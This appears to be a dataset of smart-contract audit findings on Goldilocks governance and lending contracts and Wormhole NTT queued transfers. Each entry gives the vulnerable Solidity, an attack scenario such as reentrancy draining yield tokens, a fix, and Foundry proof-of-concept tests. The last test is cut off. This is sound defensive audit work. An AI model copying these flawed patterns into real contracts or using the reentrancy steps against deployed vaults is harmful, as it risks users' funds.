name
stringlengths
5
231
severity
stringclasses
3 values
description
stringlengths
107
68.2k
recommendation
stringlengths
12
8.75k
impact
stringlengths
3
11.2k
function
stringlengths
15
64.6k
`Goldigovernor._getProposalState()` shouldn't use `totalSupply`
medium
In `_getProposalState()`, it uses `Goldiswap(goldiswap).totalSupply()` during the comparison.\\n```\\n function _getProposalState(uint256 proposalId) internal view returns (ProposalState) {\\n Proposal storage proposal = proposals[proposalId];\\n if (proposal.cancelled) return ProposalState.Canceled;\\n else if (block.number <= proposal.startBlock) return ProposalState.Pending;\\n else if (block.number <= proposal.endBlock) return ProposalState.Active;\\n else if (proposal.eta == 0) return ProposalState.Succeeded;\\n else if (proposal.executed) return ProposalState.Executed;\\n else if (proposal.forVotes <= proposal.againstVotes || proposal.forVotes < Goldiswap(goldiswap).totalSupply() / 20) { //@audit shouldn't use totalSupply\\n return ProposalState.Defeated;\\n }\\n else if (block.timestamp >= proposal.eta + Timelock(timelock).GRACE_PERIOD()) {\\n return ProposalState.Expired;\\n }\\n else {\\n return ProposalState.Queued;\\n }\\n }\\n```\\n\\nAs `totalSupply` is increasing in real time, a `Queued` proposal might be changed to `Defeated` one unexpectedly due to the increased supply.
We should introduce another mechanism for the quorum check rather than using `totalSupply`.
A proposal state might be changed unexpectedly.
```\\n function _getProposalState(uint256 proposalId) internal view returns (ProposalState) {\\n Proposal storage proposal = proposals[proposalId];\\n if (proposal.cancelled) return ProposalState.Canceled;\\n else if (block.number <= proposal.startBlock) return ProposalState.Pending;\\n else if (block.number <= proposal.endBlock) return ProposalState.Active;\\n else if (proposal.eta == 0) return ProposalState.Succeeded;\\n else if (proposal.executed) return ProposalState.Executed;\\n else if (proposal.forVotes <= proposal.againstVotes || proposal.forVotes < Goldiswap(goldiswap).totalSupply() / 20) { //@audit shouldn't use totalSupply\\n return ProposalState.Defeated;\\n }\\n else if (block.timestamp >= proposal.eta + Timelock(timelock).GRACE_PERIOD()) {\\n return ProposalState.Expired;\\n }\\n else {\\n return ProposalState.Queued;\\n }\\n }\\n```\\n
In `Goldivault.redeemYield()`, users can redeem more yield tokens using reentrancy
medium
Possible reentrancy in `Goldivault.redeemYield()` if `yieldToken` has a `beforeTokenTransfer` hook.\\nLet's assume `yt.totalSupply` = 100, `yieldToken.balance` = 100 and the user has 20 yt.\\nThe user calls `redeemYield()` with 10 yt.\\nThen `yt.totalSupply` will be changed to 90 and it will transfer `100 * 10 / 100 = 10 yieldToken` to the user.\\nInside the `beforeTokenTransfer` hook, the user calls `redeemYield()` again with 10 yt.\\nAs `yieldToken.balance` is still 100, he will receive `100 * 10 / 90 = 11 yieldToken`.\\n```\\n function redeemYield(uint256 amount) external {\\n if(amount == 0) revert InvalidRedemption();\\n if(block.timestamp < concludeTime + delay || !concluded) revert NotConcluded();\\n uint256 yieldShare = FixedPointMathLib.divWad(amount, ERC20(yt).totalSupply());\\n YieldToken(yt).burnYT(msg.sender, amount);\\n uint256 yieldTokensLength = yieldTokens.length;\\n for(uint8 i; i < yieldTokensLength; ++i) {\\n uint256 finalYield;\\n if(yieldTokens[i] == depositToken) {\\n finalYield = ERC20(yieldTokens[i]).balanceOf(address(this)) - depositTokenAmount;\\n }\\n else {\\n finalYield = ERC20(yieldTokens[i]).balanceOf(address(this));\\n }\\n uint256 claimable = FixedPointMathLib.mulWad(finalYield, yieldShare);\\n SafeTransferLib.safeTransfer(yieldTokens[i], msg.sender, claimable);\\n }\\n emit YieldTokenRedemption(msg.sender, amount);\\n }\\n```\\n
We should add a `nonReentrant` modifier to `redeemYield()`.
Malicious users can steal `yieldToken` using `redeemYield()`.
```\\n function redeemYield(uint256 amount) external {\\n if(amount == 0) revert InvalidRedemption();\\n if(block.timestamp < concludeTime + delay || !concluded) revert NotConcluded();\\n uint256 yieldShare = FixedPointMathLib.divWad(amount, ERC20(yt).totalSupply());\\n YieldToken(yt).burnYT(msg.sender, amount);\\n uint256 yieldTokensLength = yieldTokens.length;\\n for(uint8 i; i < yieldTokensLength; ++i) {\\n uint256 finalYield;\\n if(yieldTokens[i] == depositToken) {\\n finalYield = ERC20(yieldTokens[i]).balanceOf(address(this)) - depositTokenAmount;\\n }\\n else {\\n finalYield = ERC20(yieldTokens[i]).balanceOf(address(this));\\n }\\n uint256 claimable = FixedPointMathLib.mulWad(finalYield, yieldShare);\\n SafeTransferLib.safeTransfer(yieldTokens[i], msg.sender, claimable);\\n }\\n emit YieldTokenRedemption(msg.sender, amount);\\n }\\n```\\n
Wrong validation in `Goldigovernor.cancel()`
medium
In `Goldigovernor.cancel()`, the proposer should have fewer votes than `proposalThreshold` to cancel his proposal.\\n```\\n function cancel(uint256 proposalId) external {\\n if(_getProposalState(proposalId) == ProposalState.Executed) revert InvalidProposalState();\\n Proposal storage proposal = proposals[proposalId];\\n if(msg.sender != proposal.proposer) revert NotProposer();\\n if(GovLocks(govlocks).getPriorVotes(proposal.proposer, block.number - 1) > proposalThreshold) revert AboveThreshold(); //@audit incorrect\\n proposal.cancelled = true;\\n uint256 targetsLength = proposal.targets.length;\\n for (uint256 i = 0; i < targetsLength; i++) {\\n Timelock(timelock).cancelTransaction(proposal.targets[i], proposal.eta, proposal.values[i], proposal.calldatas[i], proposal.signatures[i]);\\n }\\n emit ProposalCanceled(proposalId);\\n }\\n```\\n
It should be modified like this.\\n```\\nif(msg.sender != proposal.proposer && GovLocks(govlocks).getPriorVotes(proposal.proposer, block.number - 1) > proposalThreshold) revert Error;\\n```\\n
A proposer can't cancel his proposal unless he decreases his voting power.
```\\n function cancel(uint256 proposalId) external {\\n if(_getProposalState(proposalId) == ProposalState.Executed) revert InvalidProposalState();\\n Proposal storage proposal = proposals[proposalId];\\n if(msg.sender != proposal.proposer) revert NotProposer();\\n if(GovLocks(govlocks).getPriorVotes(proposal.proposer, block.number - 1) > proposalThreshold) revert AboveThreshold(); //@audit incorrect\\n proposal.cancelled = true;\\n uint256 targetsLength = proposal.targets.length;\\n for (uint256 i = 0; i < targetsLength; i++) {\\n Timelock(timelock).cancelTransaction(proposal.targets[i], proposal.eta, proposal.values[i], proposal.calldatas[i], proposal.signatures[i]);\\n }\\n emit ProposalCanceled(proposalId);\\n }\\n```\\n
Users wouldn't cancel their proposals due to the increased `proposalThreshold`.
medium
When users call `cancel()`, it validates the caller's voting power with `proposalThreshold` which can be changed using `setProposalThreshold()`.\\n```\\n function setProposalThreshold(uint256 newProposalThreshold) external {\\n if(msg.sender != multisig) revert NotMultisig();\\n if(newProposalThreshold < MIN_PROPOSAL_THRESHOLD || newProposalThreshold > MAX_PROPOSAL_THRESHOLD) revert InvalidVotingParameter();\\n uint256 oldProposalThreshold = proposalThreshold;\\n proposalThreshold = newProposalThreshold;\\n emit ProposalThresholdSet(oldProposalThreshold, proposalThreshold);\\n }\\n```\\n\\nHere is a possible scenario.\\nLet's assume `proposalThreshold` = 100 and a user has 100 voting power.\\nThe user has proposed a proposal using `propose()`.\\nAfter that, `proposalThreshold` was increased to 150 by `multisig`.\\nWhen the user calls `cancel()`, it will revert as he doesn't have enough voting power.
It would be good to cache `proposalThreshold` as a proposal state.
Users wouldn't cancel their proposals due to the increased `proposalThreshold`.
```\\n function setProposalThreshold(uint256 newProposalThreshold) external {\\n if(msg.sender != multisig) revert NotMultisig();\\n if(newProposalThreshold < MIN_PROPOSAL_THRESHOLD || newProposalThreshold > MAX_PROPOSAL_THRESHOLD) revert InvalidVotingParameter();\\n uint256 oldProposalThreshold = proposalThreshold;\\n proposalThreshold = newProposalThreshold;\\n emit ProposalThresholdSet(oldProposalThreshold, proposalThreshold);\\n }\\n```\\n
`Goldilend.liquidate()` might revert due to underflow
medium
In `repay()`, there would be a rounding during the `interest` calculation.\\n```\\n function repay(uint256 repayAmount, uint256 _userLoanId) external {\\n Loan memory userLoan = loans[msg.sender][_userLoanId];\\n if(userLoan.borrowedAmount < repayAmount) revert ExcessiveRepay();\\n if(block.timestamp > userLoan.endDate) revert LoanExpired();\\n uint256 interestLoanRatio = FixedPointMathLib.divWad(userLoan.interest, userLoan.borrowedAmount);\\nL425 uint256 interest = FixedPointMathLib.mulWadUp(repayAmount, interestLoanRatio); //@audit rounding issue\\n outstandingDebt -= repayAmount - interest > outstandingDebt ? outstandingDebt : repayAmount - interest;\\n // rest of code\\n }\\n// rest of code\\n function liquidate(address user, uint256 _userLoanId) external {\\n Loan memory userLoan = loans[msg.sender][_userLoanId];\\n if(block.timestamp < userLoan.endDate || userLoan.liquidated || userLoan.borrowedAmount == 0) revert Unliquidatable();\\n loans[user][_userLoanId].liquidated = true;\\n loans[user][_userLoanId].borrowedAmount = 0;\\nL448 outstandingDebt -= userLoan.borrowedAmount - userLoan.interest;\\n // rest of code\\n }\\n```\\n\\nHere is a possible scenario.\\nThere are 2 borrowers of `borrowedAmount = 100, `interest` = 10`. And `outstandingDebt = 2 * (100 - 10) = 180`.\\nThe first borrower calls `repay()` with `repayAmount = 100`.\\nDue to the rounding issue at L425, `interest` is 9 instead of 10. And `outstandingDebt = 180 - (100 - 9) = 89`.\\nIn `liquidate()` for the second borrower, it will revert at L448 because `outstandingDebt = 89 < borrowedAmount - `interest` = 90`.
In `liquidate()`, `outstandingDebt` should be updated like the below.\\n```\\n /// @inheritdoc IGoldilend\\n function liquidate(address user, uint256 _userLoanId) external {\\n Loan memory userLoan = loans[msg.sender][_userLoanId];\\n if(block.timestamp < userLoan.endDate || userLoan.liquidated || userLoan.borrowedAmount == 0) revert Unliquidatable();\\n loans[user][_userLoanId].liquidated = true;\\n loans[user][_userLoanId].borrowedAmount = 0;\\n// Add the line below\\n uint256 debtToRepay = userLoan.borrowedAmount - userLoan.interest;\\n// Add the line below\\n outstandingDebt -= debtToRepay > outstandingDebt ? outstandingDebt : debtToRepay;\\n // rest of code\\n }\\n```\\n
`liquidate()` might revert due to underflow.
```\\n function repay(uint256 repayAmount, uint256 _userLoanId) external {\\n Loan memory userLoan = loans[msg.sender][_userLoanId];\\n if(userLoan.borrowedAmount < repayAmount) revert ExcessiveRepay();\\n if(block.timestamp > userLoan.endDate) revert LoanExpired();\\n uint256 interestLoanRatio = FixedPointMathLib.divWad(userLoan.interest, userLoan.borrowedAmount);\\nL425 uint256 interest = FixedPointMathLib.mulWadUp(repayAmount, interestLoanRatio); //@audit rounding issue\\n outstandingDebt -= repayAmount - interest > outstandingDebt ? outstandingDebt : repayAmount - interest;\\n // rest of code\\n }\\n// rest of code\\n function liquidate(address user, uint256 _userLoanId) external {\\n Loan memory userLoan = loans[msg.sender][_userLoanId];\\n if(block.timestamp < userLoan.endDate || userLoan.liquidated || userLoan.borrowedAmount == 0) revert Unliquidatable();\\n loans[user][_userLoanId].liquidated = true;\\n loans[user][_userLoanId].borrowedAmount = 0;\\nL448 outstandingDebt -= userLoan.borrowedAmount - userLoan.interest;\\n // rest of code\\n }\\n```\\n
In `Goldigovernor`, wrong assumption of block time
medium
In `Goldigovernor.sol`, voting period/delay limits are set with 15s block time.\\n```\\n /// @notice Minimum voting period\\n uint32 public constant MIN_VOTING_PERIOD = 5760; // About 24 hours\\n\\n /// @notice Maximum voting period\\n uint32 public constant MAX_VOTING_PERIOD = 80640; // About 2 weeks\\n\\n /// @notice Minimum voting delay\\n uint32 public constant MIN_VOTING_DELAY = 1;\\n\\n /// @notice Maximum voting delay\\n uint32 public constant MAX_VOTING_DELAY = 40320; // About 1 week\\n```\\n\\nBut Berachain has 5s block time according to its documentation.\\n```\\nBerachain has the following properties:\\n\\n- Block time: 5s\\n```\\n\\nSo these limits will be set shorter than expected.
We should calculate these limits with 5s block time.
Voting period/delay limits will be set shorter than expected.
```\\n /// @notice Minimum voting period\\n uint32 public constant MIN_VOTING_PERIOD = 5760; // About 24 hours\\n\\n /// @notice Maximum voting period\\n uint32 public constant MAX_VOTING_PERIOD = 80640; // About 2 weeks\\n\\n /// @notice Minimum voting delay\\n uint32 public constant MIN_VOTING_DELAY = 1;\\n\\n /// @notice Maximum voting delay\\n uint32 public constant MAX_VOTING_DELAY = 40320; // About 1 week\\n```\\n
Queued transfers can become stuck on the source chain if Transceiver instructions are encoded in the incorrect order
high
In the case of multiple Transceivers, the current logic expects that a sender encodes Transceiver instructions in order of increasing Transceiver registration index, as validated in `TransceiverStructs::parseTransceiverInstructions`. Under normal circumstances, this logic works as expected, and the transaction fails when the user packs transceiver instructions in the incorrect order.\\n```\\n/* snip */\\nfor (uint256 i = 0; i < instructionsLength; i++) {\\n TransceiverInstruction memory instruction;\\n (instruction, offset) = parseTransceiverInstructionUnchecked(encoded, offset);\\n\\n uint8 instructionIndex = instruction.index;\\n\\n // The instructions passed in have to be strictly increasing in terms of transceiver index\\n if (i != 0 && instructionIndex <= lastIndex) {\\n revert UnorderedInstructions();\\n }\\n lastIndex = instructionIndex;\\n\\n instructions[instructionIndex] = instruction;\\n}\\n/* snip */\\n```\\n\\nHowever, this requirement on the order of Transceiver indices is not checked when transfers are initially queued for delayed execution. As a result, a transaction where this is the case will fail when the user calls `NttManager::completeOutboundQueuedTransfer` to execute a queued transfer.
When the transfer amount exceeds the current outbound capacity, verify the Transceiver instructions are ordered correctly before adding a message to the list of queued transfers.
The sender's funds are transferred to the NTT Manager when messages are queued. However, this queued message can never be executed if the Transceiver indices are incorrectly ordered and, as a result, the user funds remain stuck in the NTT Manager.\\nProof of Concept: Run the following test:\\n```\\ncontract TestWrongTransceiverOrder is Test, INttManagerEvents, IRateLimiterEvents {\\n NttManager nttManagerChain1;\\n NttManager nttManagerChain2;\\n\\n using TrimmedAmountLib for uint256;\\n using TrimmedAmountLib for TrimmedAmount;\\n\\n uint16 constant chainId1 = 7;\\n uint16 constant chainId2 = 100;\\n uint8 constant FAST_CONSISTENCY_LEVEL = 200;\\n uint256 constant GAS_LIMIT = 500000;\\n\\n uint16 constant SENDING_CHAIN_ID = 1;\\n uint256 constant DEVNET_GUARDIAN_PK =\\n 0xcfb12303a19cde580bb4dd771639b0d26bc68353645571a8cff516ab2ee113a0;\\n WormholeSimulator guardian;\\n uint256 initialBlockTimestamp;\\n\\n WormholeTransceiver wormholeTransceiverChain1;\\n WormholeTransceiver wormholeTransceiver2Chain1;\\n\\n WormholeTransceiver wormholeTransceiverChain2;\\n address userA = address(0x123);\\n address userB = address(0x456);\\n address userC = address(0x789);\\n address userD = address(0xABC);\\n\\n address relayer = address(0x28D8F1Be96f97C1387e94A53e00eCcFb4E75175a);\\n IWormhole wormhole = IWormhole(0x706abc4E45D419950511e474C7B9Ed348A4a716c);\\n\\n function setUp() public {\\n string memory url = "https://goerli.blockpi.network/v1/rpc/public";\\n vm.createSelectFork(url);\\n initialBlockTimestamp = vm.getBlockTimestamp();\\n\\n guardian = new WormholeSimulator(address(wormhole), DEVNET_GUARDIAN_PK);\\n\\n vm.chainId(chainId1);\\n DummyToken t1 = new DummyToken();\\n NttManager implementation =\\n new MockNttManagerContract(address(t1), INttManager.Mode.LOCKING, chainId1, 1 days);\\n\\n nttManagerChain1 =\\n MockNttManagerContract(address(new ERC1967Proxy(address(implementation), "")));\\n nttManagerChain1.initialize();\\n\\n WormholeTransceiver wormholeTransceiverChain1Implementation = new MockWormholeTransceiverContract(\\n address(nttManagerChain1),\\n address(wormhole),\\n address(relayer),\\n address(0x0),\\n FAST_CONSISTENCY_LEVEL,\\n GAS_LIMIT\\n );\\n wormholeTransceiverChain1 = MockWormholeTransceiverContract(\\n address(new ERC1967Proxy(address(wormholeTransceiverChain1Implementation), ""))\\n );\\n\\n WormholeTransceiver wormholeTransceiverChain1Implementation2 = new MockWormholeTransceiverContract(\\n address(nttManagerChain1),\\n address(wormhole),\\n address(relayer),\\n address(0x0),\\n FAST_CONSISTENCY_LEVEL,\\n GAS_LIMIT\\n );\\n wormholeTransceiver2Chain1 = MockWormholeTransceiverContract(\\n address(new ERC1967Proxy(address(wormholeTransceiverChain1Implementation2), ""))\\n );\\n\\n\\n // Actually initialize properly now\\n wormholeTransceiverChain1.initialize();\\n wormholeTransceiver2Chain1.initialize();\\n\\n\\n nttManagerChain1.setTransceiver(address(wormholeTransceiverChain1));\\n nttManagerChain1.setTransceiver(address(wormholeTransceiver2Chain1));\\n nttManagerChain1.setOutboundLimit(type(uint64).max);\\n nttManagerChain1.setInboundLimit(type(uint64).max, chainId2);\\n\\n // Chain 2 setup\\n vm.chainId(chainId2);\\n DummyToken t2 = new DummyTokenMintAndBurn();\\n NttManager implementationChain2 =\\n new MockNttManagerContract(address(t2), INttManager.Mode.BURNING, chainId2, 1 days);\\n\\n nttManagerChain2 =\\n MockNttManagerContract(address(new ERC1967Proxy(address(implementationChain2), "")));\\n nttManagerChain2.initialize();\\n\\n WormholeTransceiver wormholeTransceiverChain2Implementation = new MockWormholeTransceiverContract(\\n address(nttManagerChain2),\\n address(wormhole),\\n address(relayer),\\n address(0x0),\\n FAST_CONSISTENCY_LEVEL,\\n GAS_LIMIT\\n );\\n\\n wormholeTransceiverChain2 = MockWormholeTransceiverContract(\\n address(new ERC1967Proxy(address(wormholeTransceiverChain2Implementation), ""))\\n );\\n wormholeTransceiverChain2.initialize();\\n\\n nttManagerChain2.setTransceiver(address(wormholeTransceiverChain2));\\n nttManagerChain2.setOutboundLimit(type(uint64).max);\\n nttManagerChain2.setInboundLimit(type(uint64).max, chainId1);\\n\\n // Register peer contracts for the nttManager and transceiver. Transceivers and nttManager each have the concept of peers here.\\n nttManagerChain1.setPeer(chainId2, bytes32(uint256(uint160(address(nttManagerChain2)))), 9);\\n nttManagerChain2.setPeer(chainId1, bytes32(uint256(uint160(address(nttManagerChain1)))), 7);\\n\\n // Set peers for the transceivers\\n wormholeTransceiverChain1.setWormholePeer(\\n chainId2, bytes32(uint256(uint160(address(wormholeTransceiverChain2))))\\n );\\n\\n wormholeTransceiver2Chain1.setWormholePeer(\\n chainId2, bytes32(uint256(uint160(address(wormholeTransceiverChain2))))\\n );\\n\\n wormholeTransceiverChain2.setWormholePeer(\\n chainId1, bytes32(uint256(uint160(address(wormholeTransceiverChain1))))\\n );\\n\\n require(nttManagerChain1.getThreshold() != 0, "Threshold is zero with active transceivers");\\n\\n // Actually set it\\n nttManagerChain1.setThreshold(2);\\n nttManagerChain2.setThreshold(1);\\n }\\n\\n function testWrongTransceiverOrder() external {\\n vm.chainId(chainId1);\\n\\n // Setting up the transfer\\n DummyToken token1 = DummyToken(nttManagerChain1.token());\\n uint8 decimals = token1.decimals();\\n\\n token1.mintDummy(address(userA), 5 * 10 ** decimals);\\n uint256 outboundLimit = 4 * 10 ** decimals;\\n nttManagerChain1.setOutboundLimit(outboundLimit);\\n\\n vm.startPrank(userA);\\n\\n uint256 transferAmount = 5 * 10 ** decimals;\\n token1.approve(address(nttManagerChain1), transferAmount);\\n\\n // transfer with shouldQueue == true\\n uint64 qSeq = nttManagerChain1.transfer(\\n transferAmount, chainId2, toWormholeFormat(userB), true, encodeTransceiverInstructionsJumbled(true)\\n );\\n\\n assertEq(qSeq, 0);\\n IRateLimiter.OutboundQueuedTransfer memory qt = nttManagerChain1.getOutboundQueuedTransfer(0);\\n assertEq(qt.amount.getAmount(), transferAmount.trim(decimals, decimals).getAmount());\\n assertEq(qt.recipientChain, chainId2);\\n assertEq(qt.recipient, toWormholeFormat(userB));\\n assertEq(qt.txTimestamp, initialBlockTimestamp);\\n\\n // assert that the contract also locked funds from the user\\n assertEq(token1.balanceOf(address(userA)), 0);\\n assertEq(token1.balanceOf(address(nttManagerChain1)), transferAmount);\\n\\n // elapse rate limit duration - 1\\n uint256 durationElapsedTime = initialBlockTimestamp + nttManagerChain1.rateLimitDuration();\\n\\n vm.warp(durationElapsedTime);\\n\\n vm.expectRevert(0x71f23ef2); //UnorderedInstructions() selector\\n nttManagerChain1.completeOutboundQueuedTransfer(0);\\n }\\n\\n // Encode an instruction for each of the relayers\\n function encodeTransceiverInstructionsJumbled(bool relayer_off) public view returns (bytes memory) {\\n WormholeTransceiver.WormholeTransceiverInstruction memory instruction =\\n IWormholeTransceiver.WormholeTransceiverInstruction(relayer_off);\\n\\n bytes memory encodedInstructionWormhole =\\n wormholeTransceiverChain1.encodeWormholeTransceiverInstruction(instruction);\\n\\n TransceiverStructs.TransceiverInstruction memory TransceiverInstruction1 =\\n TransceiverStructs.TransceiverInstruction({index: 0, payload: encodedInstructionWormhole});\\n TransceiverStructs.TransceiverInstruction memory TransceiverInstruction2 =\\n TransceiverStructs.TransceiverInstruction({index: 1, payload: encodedInstructionWormhole});\\n\\n TransceiverStructs.TransceiverInstruction[] memory TransceiverInstructions =\\n new TransceiverStructs.TransceiverInstruction[](2);\\n\\n TransceiverInstructions[0] = TransceiverInstruction2;\\n TransceiverInstructions[1] = TransceiverInstruction1;\\n\\n return TransceiverStructs.encodeTransceiverInstructions(TransceiverInstructions);\\n }\\n}\\n```\\n
```\\n/* snip */\\nfor (uint256 i = 0; i < instructionsLength; i++) {\\n TransceiverInstruction memory instruction;\\n (instruction, offset) = parseTransceiverInstructionUnchecked(encoded, offset);\\n\\n uint8 instructionIndex = instruction.index;\\n\\n // The instructions passed in have to be strictly increasing in terms of transceiver index\\n if (i != 0 && instructionIndex <= lastIndex) {\\n revert UnorderedInstructions();\\n }\\n lastIndex = instructionIndex;\\n\\n instructions[instructionIndex] = instruction;\\n}\\n/* snip */\\n```\\n
Queued transfers can become stuck on the source chain if new Transceivers are added or existing Transceivers are modified before completion
high
When a sender transfers an amount that exceeds the current outbound capacity, such transfers are sent to a queue for delayed execution within `NttManager::_transferEntrypoint`. The rate limit duration is defined as an immutable variable determining the temporal lag between queueing and execution, with a typical rate limit duration being 24 hours.\\n```\\n/* snip */\\n// now check rate limits\\nbool isAmountRateLimited = _isOutboundAmountRateLimited(internalAmount);\\nif (!shouldQueue && isAmountRateLimited) {\\n revert NotEnoughCapacity(getCurrentOutboundCapacity(), amount);\\n}\\nif (shouldQueue && isAmountRateLimited) {\\n // emit an event to notify the user that the transfer is rate limited\\n emit OutboundTransferRateLimited(\\n msg.sender, sequence, amount, getCurrentOutboundCapacity()\\n );\\n\\n // queue up and return\\n _enqueueOutboundTransfer(\\n sequence,\\n trimmedAmount,\\n recipientChain,\\n recipient,\\n msg.sender,\\n transceiverInstructions\\n );\\n\\n // refund price quote back to sender\\n _refundToSender(msg.value);\\n\\n // return the sequence in the queue\\n return sequence;\\n}\\n/* snip */\\n```\\n\\nIn the event that new Transceivers are added or existing Transceivers are removed from the NTT Manager, any pending queued transfers within the rate limit duration can potentially revert. This is because senders might not have correctly packed the Transceiver instructions for a given Transceiver based on the new configuration, and a missing Transceiver instruction can potentially cause an array index out-of-bounds exception while calculating the delivery price when the instructions are finally parsed. For example, if there are initially two Transceivers but an additional Transceiver is added while the transfer is rate-limited, the instructions array as shown below will be declared with a length of three, corresponding to the new number of enabled Transceivers; however, the transfer will have only encoded two Transceiver instructions based on the configuration at the time it was initiated.\\n```\\nfunction parseTransceiverInstructions(\\n bytes memory encoded,\\n uint256 numEnabledTransceivers\\n) public pure returns (TransceiverInstruction[] memory) {\\n uint256 offset = 0;\\n uint256 instructionsLength;\\n (instructionsLength, offset) = encoded.asUint8Unchecked(offset);\\n\\n // We allocate an array with the length of the number of enabled transceivers\\n // This gives us the flexibility to not have to pass instructions for transceivers that\\n // don't need them\\n TransceiverInstruction[] memory instructions =\\n new TransceiverInstruction[](numEnabledTransceivers);\\n\\n uint256 lastIndex = 0;\\n for (uint256 i = 0; i < instructionsLength; i++) {\\n TransceiverInstruction memory instruction;\\n (instruction, offset) = parseTransceiverInstructionUnchecked(encoded, offset);\\n\\n uint8 instructionIndex = instruction.index;\\n\\n // The instructions passed in have to be strictly increasing in terms of transceiver index\\n if (i != 0 && instructionIndex <= lastIndex) {\\n revert UnorderedInstructions();\\n }\\n lastIndex = instructionIndex;\\n\\n instructions[instructionIndex] = instruction;\\n }\\n\\n encoded.checkLength(offset);\\n\\n return instructions;\\n}\\n```\\n
Consider passing no instructions into the delivery price estimation when the Transceiver index does not exist.
Missing Transceiver instructions prevents the total delivery price for the corresponding message from being calculated. This prevents any queued Transfers from being executed with the current list of transceivers. As a result, underlying sender funds will be stuck in the `NttManager` contract. Note that a similar issue occurs if the peer NTT manager contract is updated on the destination (say, after a redeployment on the source chain) before an in-flight attestation is received and executed, reverting with an invalid peer error.\\nProof of Concept: Run the following test:\\n```\\ncontract TestTransceiverModification is Test, INttManagerEvents, IRateLimiterEvents {\\n NttManager nttManagerChain1;\\n NttManager nttManagerChain2;\\n\\n using TrimmedAmountLib for uint256;\\n using TrimmedAmountLib for TrimmedAmount;\\n\\n uint16 constant chainId1 = 7;\\n uint16 constant chainId2 = 100;\\n uint8 constant FAST_CONSISTENCY_LEVEL = 200;\\n uint256 constant GAS_LIMIT = 500000;\\n\\n uint16 constant SENDING_CHAIN_ID = 1;\\n uint256 constant DEVNET_GUARDIAN_PK =\\n 0xcfb12303a19cde580bb4dd771639b0d26bc68353645571a8cff516ab2ee113a0;\\n WormholeSimulator guardian;\\n uint256 initialBlockTimestamp;\\n\\n WormholeTransceiver wormholeTransceiverChain1;\\n WormholeTransceiver wormholeTransceiver2Chain1;\\n WormholeTransceiver wormholeTransceiver3Chain1;\\n\\n WormholeTransceiver wormholeTransceiverChain2;\\n address userA = address(0x123);\\n address userB = address(0x456);\\n address userC = address(0x789);\\n address userD = address(0xABC);\\n\\n address relayer = address(0x28D8F1Be96f97C1387e94A53e00eCcFb4E75175a);\\n IWormhole wormhole = IWormhole(0x706abc4E45D419950511e474C7B9Ed348A4a716c);\\n\\n function setUp() public {\\n string memory url = "https://goerli.blockpi.network/v1/rpc/public";\\n vm.createSelectFork(url);\\n initialBlockTimestamp = vm.getBlockTimestamp();\\n\\n guardian = new WormholeSimulator(address(wormhole), DEVNET_GUARDIAN_PK);\\n\\n vm.chainId(chainId1);\\n DummyToken t1 = new DummyToken();\\n NttManager implementation =\\n new MockNttManagerContract(address(t1), INttManager.Mode.LOCKING, chainId1, 1 days);\\n\\n nttManagerChain1 =\\n MockNttManagerContract(address(new ERC1967Proxy(address(implementation), "")));\\n nttManagerChain1.initialize();\\n\\n // transceiver 1\\n WormholeTransceiver wormholeTransceiverChain1Implementation = new MockWormholeTransceiverContract(\\n address(nttManagerChain1),\\n address(wormhole),\\n address(relayer),\\n address(0x0),\\n FAST_CONSISTENCY_LEVEL,\\n GAS_LIMIT\\n );\\n wormholeTransceiverChain1 = MockWormholeTransceiverContract(\\n address(new ERC1967Proxy(address(wormholeTransceiverChain1Implementation), ""))\\n );\\n\\n // transceiver 2\\n WormholeTransceiver wormholeTransceiverChain1Implementation2 = new MockWormholeTransceiverContract(\\n address(nttManagerChain1),\\n address(wormhole),\\n address(relayer),\\n address(0x0),\\n FAST_CONSISTENCY_LEVEL,\\n GAS_LIMIT\\n );\\n wormholeTransceiver2Chain1 = MockWormholeTransceiverContract(\\n address(new ERC1967Proxy(address(wormholeTransceiverChain1Implementation2), ""))\\n );\\n\\n // transceiver 3\\n WormholeTransceiver wormholeTransceiverChain1Implementation3 = new MockWormholeTransceiverContract(\\n address(nttManagerChain1),\\n address(wormhole),\\n address(relayer),\\n address(0x0),\\n FAST_CONSISTENCY_LEVEL,\\n GAS_LIMIT\\n );\\n wormholeTransceiver3Chain1 = MockWormholeTransceiverContract(\\n address(new ERC1967Proxy(address(wormholeTransceiverChain1Implementation3), ""))\\n );\\n\\n\\n // Actually initialize properly now\\n wormholeTransceiverChain1.initialize();\\n wormholeTransceiver2Chain1.initialize();\\n wormholeTransceiver3Chain1.initialize();\\n\\n\\n nttManagerChain1.setTransceiver(address(wormholeTransceiverChain1));\\n nttManagerChain1.setTransceiver(address(wormholeTransceiver2Chain1));\\n\\n // third transceiver is NOT set at this point for nttManagerChain1\\n nttManagerChain1.setOutboundLimit(type(uint64).max);\\n nttManagerChain1.setInboundLimit(type(uint64).max, chainId2);\\n\\n // Chain 2 setup\\n vm.chainId(chainId2);\\n DummyToken t2 = new DummyTokenMintAndBurn();\\n NttManager implementationChain2 =\\n new MockNttManagerContract(address(t2), INttManager.Mode.BURNING, chainId2, 1 days);\\n\\n nttManagerChain2 =\\n MockNttManagerContract(address(new ERC1967Proxy(address(implementationChain2), "")));\\n nttManagerChain2.initialize();\\n\\n WormholeTransceiver wormholeTransceiverChain2Implementation = new MockWormholeTransceiverContract(\\n address(nttManagerChain2),\\n address(wormhole),\\n address(relayer),\\n address(0x0),\\n FAST_CONSISTENCY_LEVEL,\\n GAS_LIMIT\\n );\\n\\n wormholeTransceiverChain2 = MockWormholeTransceiverContract(\\n address(new ERC1967Proxy(address(wormholeTransceiverChain2Implementation), ""))\\n );\\n wormholeTransceiverChain2.initialize();\\n\\n nttManagerChain2.setTransceiver(address(wormholeTransceiverChain2));\\n nttManagerChain2.setOutboundLimit(type(uint64).max);\\n nttManagerChain2.setInboundLimit(type(uint64).max, chainId1);\\n\\n // Register peer contracts for the nttManager and transceiver. Transceivers and nttManager each have the concept of peers here.\\n nttManagerChain1.setPeer(chainId2, bytes32(uint256(uint160(address(nttManagerChain2)))), 9);\\n nttManagerChain2.setPeer(chainId1, bytes32(uint256(uint160(address(nttManagerChain1)))), 7);\\n\\n // Set peers for the transceivers\\n wormholeTransceiverChain1.setWormholePeer(\\n chainId2, bytes32(uint256(uint160(address(wormholeTransceiverChain2))))\\n );\\n\\n wormholeTransceiver2Chain1.setWormholePeer(\\n chainId2, bytes32(uint256(uint160(address(wormholeTransceiverChain2))))\\n );\\n\\n wormholeTransceiver3Chain1.setWormholePeer(\\n chainId2, bytes32(uint256(uint160(address(wormholeTransceiverChain2))))\\n );\\n\\n\\n wormholeTransceiverChain2.setWormholePeer(\\n chainId1, bytes32(uint256(uint160(address(wormholeTransceiverChain1))))\\n );\\n\\n\\n require(nttManagerChain1.getThreshold() 